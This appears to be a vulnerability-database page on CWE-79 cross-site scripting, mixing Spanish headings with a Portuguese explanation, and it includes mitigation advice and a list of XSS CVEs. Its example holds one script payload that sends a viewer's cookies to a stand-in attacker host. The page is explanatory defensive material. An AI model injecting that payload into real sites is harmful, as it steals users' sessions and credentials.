Fallos del tipo CWE-79

30.221 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2025-30848HIGHWordPress Hostel plugin <= 1.1.5 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2025-30869HIGHWordPress Image Wall plugin <= 3.0 - Cross Site Scripting (XSS) VulnerabilityEPSS 0.3%CVE-2025-30520HIGHWordPress Breezing Forms plugin <= 1.2.8.11 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2024-4224MEDIUMTP-Link TL-SG1016DE XSSEPSS 0.3%CVE-2026-23839CRITICALMovary vulnerable to Cross-site Scripting with `?categoryUpdated=` paramEPSS 0.3%CVE-2026-113487MEDIUMGeoDirectory < 2.8.196 - Contributor+ Stored XSS via gd_post_badge 'link' AttributeEPSS 0.3%CVE-2024-24712MEDIUMWordPress Heateor Social Login Plugin <= 1.1.30 is vulnerable to Cross Site Scripting (XSS)EPSS 0.3%CVE-2025-8834MEDIUMJCG Link-net LW-N915R Wireless Basic Settings basic.asp cross site scriptingEPSS 0.3%CVE-2024-22137MEDIUMWordPress Constant Contact Forms by MailMunch Plugin <= 2.0.11 is vulnerable to Cross Site Scripting (XSS)EPSS 0.3%CVE-2025-30544HIGHWordPress OK Poster Group plugin <= 1.1 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2024-22310MEDIUMWordPress Formzu WP Plugin <= 1.6.7 is vulnerable to Cross Site Scripting (XSS)EPSS 0.3%CVE-2025-24559HIGHWordPress WP Mailster plugin <= 1.8.15.0 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2024-31349MEDIUMWordPress MailMunch – Grow your Email List plugin <= 3.1.6 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2024-30232MEDIUMWordPress Exclusive Addons for Elementor plugin <= 2.6.9 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2025-30548HIGHWordPress Advanced Post Search plugin <= 1.1.0 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2025-30559HIGHWordPress Kento WordPress Stats plugin <= 1.1 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2021-24822—Stylish Cost Calculator < 7.04 - Subscriber+ Unauthorised AJAX Calls to Stored XSSEPSS 0.3%CVE-2025-30924HIGHWordPress Primer MyData for Woocommerce plugin < 4.2.4 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2024-24880MEDIUMWordPress Apollo13 Framework Extensions Plugin <= 1.9.2 is vulnerable to Cross Site Scripting (XSS)EPSS 0.3%CVE-2024-9241MEDIUMPDF Image Generator <= 1.5.6 - Reflected Cross-Site ScriptingEPSS 0.3%